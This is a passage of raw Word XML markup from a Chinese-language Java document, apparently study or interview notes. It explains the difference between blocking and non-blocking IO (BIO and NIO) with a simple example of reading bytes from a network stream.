          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>方法的关键一句话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C263F" w:rsidRPr="006C263F" w:rsidRDefault="006C263F" w:rsidP="00644769">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00644769" w:rsidRDefault="00F512D8" w:rsidP="00F512D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E768CE" w:rsidRDefault="00E768CE" w:rsidP="002A548F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.10  BIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidR="0033464B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0033464B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00F512D8" w:rsidP="00BD00F1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>1.2.10</w:t>
      </w:r>
      <w:r w:rsidR="00BD00F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>网络通信模型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>BIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65602" w:rsidRPr="0004620E" w:rsidRDefault="00D60537" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C71AE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00D65602" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阻塞</w:t>
      </w:r>
      <w:r w:rsidR="00D65602" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="00D65602" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与非阻塞</w:t>
      </w:r>
      <w:r w:rsidR="00D65602" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="00D706B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有很多人把阻塞认为是同步，把非阻塞认为是异步；个人认为这样是不准确的，当然从思想上可以这样类比，但方式是完全不同的，下面说说在</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="00D706B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDK1.4</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中引入了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的类库，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>涉及</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的操作拥有阻塞式和非阻塞式两种，问一下阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有什么区别？有什么优缺点？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="00003E46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在阻塞模式下，若从网络流中读取不到指定大小的数据量，阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就在那里阻塞着。比如，已知后面会有</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节的数据发过来，但是我现在只收到</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节，那么当前线程就在那傻傻地等到下一个字节的到来，对，就在那等着，啥事也不做，直到把这</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节读取完，这才将阻塞放开通行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="00003E46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在非阻塞模式下，若从网络流中读取不到指定大小的数据量，非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就立即通行。比如，已知后面会有</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节的数据发过来，但是我现在只收到</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节，那么当前线程就读取这</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节的数据，读完后就立即返回，等另外两个字节再来的时候再去读取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="000B1FB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从上面可以看出，阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在性能方面是很低下的，。而使用非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="00DE259A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的话，一到两个线程基本上就够了，因为线程不会产生</w:t>
      </w:r>
      <w:r w:rsidR="00DE259A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阻塞。</w:t>
      </w:r>
      <w:r w:rsidR="000B1FB1" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果要使用阻塞</w:t>
      </w:r>
      <w:r w:rsidR="000B1FB1" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="000B1FB1" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完成一个</w:t>
      </w:r>
      <w:r w:rsidR="000B1FB1" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="000B1FB1" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器的话，那么对于每一个请求都必须启用一个线程进行处理</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>塞，好比一下接收</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求的数据，另一下接收</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求的数据，等等，就是不停地东奔西跑，直接到把数据接收完了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D706B6" w:rsidRPr="0004620E" w:rsidRDefault="00D706B6" w:rsidP="000B1FB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽然说，非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
